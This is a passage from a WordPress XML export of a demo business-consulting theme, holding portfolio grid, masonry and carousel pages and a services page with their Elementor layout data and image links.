			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/">Fund Management</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/startup/">startup</a></p> 
			Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>847</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:25:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:25:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-grid]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"0238f9e","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"513ab33","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e2dfe3b","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"5d7a201","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"position":"","filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:14:"subtitle_style";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:2:{s:21:"overlay_style_section";a:1:{s:8:"position";i:1;}s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Masonry</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio-masonry/</link>
		<pubDate>Fri, 11 Sep 2020 07:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=858</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
	        		<ul>
	        				        			 	<li><a href="#" data-filter="*">All</a></li>
	        					                		                    <li>
								<a href='#' data-filter='.category-22'>business</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-23'>finance</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-29'>marketing</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-28'>startup</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-27'>strategy</a>
							</li>	                    
		                					</ul>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/">
				<img width="1420" height="1420" src="https://maxbizz.s3.amazonaws.com/images/project1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project1-100x100.jpg 100w" sizes="(max-width: 1420px) 100vw, 1420px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/">
				<img width="1420" height="1630" src="https://maxbizz.s3.amazonaws.com/images/project2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project2-261x300.jpg 261w, https://maxbizz.s3.amazonaws.com/images/project2-892x1024.jpg 892w, https://maxbizz.s3.amazonaws.com/images/project2-768x882.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project2-1338x1536.jpg 1338w, https://maxbizz.s3.amazonaws.com/images/project2-300x344.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project2-600x689.jpg 600w" sizes="(max-width: 1420px) 100vw, 1420px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">
				<img width="719" height="719" src="https://maxbizz.s3.amazonaws.com/images/project-3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-3-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3-600x600.jpg 600w" sizes="(max-width: 719px) 100vw, 719px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/">
				<img width="719" height="797" src="https://maxbizz.s3.amazonaws.com/images/project-4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-4-271x300.jpg 271w" sizes="(max-width: 719px) 100vw, 719px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/">
				<img width="605" height="605" src="https://maxbizz.s3.amazonaws.com/images/project-6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-6-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6-600x600.jpg 600w" sizes="(max-width: 605px) 100vw, 605px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/strategy/">strategy</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/">
				<img width="605" height="736" src="https://maxbizz.s3.amazonaws.com/images/project-5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-5-247x300.jpg 247w" sizes="(max-width: 605px) 100vw, 605px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/fund-management/">Fund Management</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/startup/">startup</a></p> 
			Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>858</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-masonry]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"26ace0b","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"eee344b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"df7a7a2","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"32a1880","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","style":"p-masonry","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:14:"subtitle_style";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"style";i:1;s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:1:{s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Carousel</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio-carousel/</link>
		<pubDate>Fri, 11 Sep 2020 07:47:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=861</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz/portfolio-cat/strategy/">strategy</a></p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>861</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:47:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:47:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-carousel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"a208449","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"170","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"120","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e6f2aa0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"444437c","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"01f9e90","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"d3bcd52","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"cadf2c3","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"c55927b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b91e1d6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0af249f","elType":"widget","settings":{"tshow_mobile":"1","dots_spacing_mobile":{"unit":"px","size":-60,"sizes":[]}},"elements":[],"widgetType":"ipcarousel"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;}}}}s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:14:"subtitle_style";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:5:"align";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}s:14:"section_layout";a:1:{s:6:"layout";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:10:"ipcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:12:"tshow_mobile";i:1;}}s:5:"style";a:1:{s:18:"navigation_section";a:1:{s:19:"dots_spacing_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/</link>
		<pubDate>Fri, 11 Sep 2020 08:07:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=868</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>	    
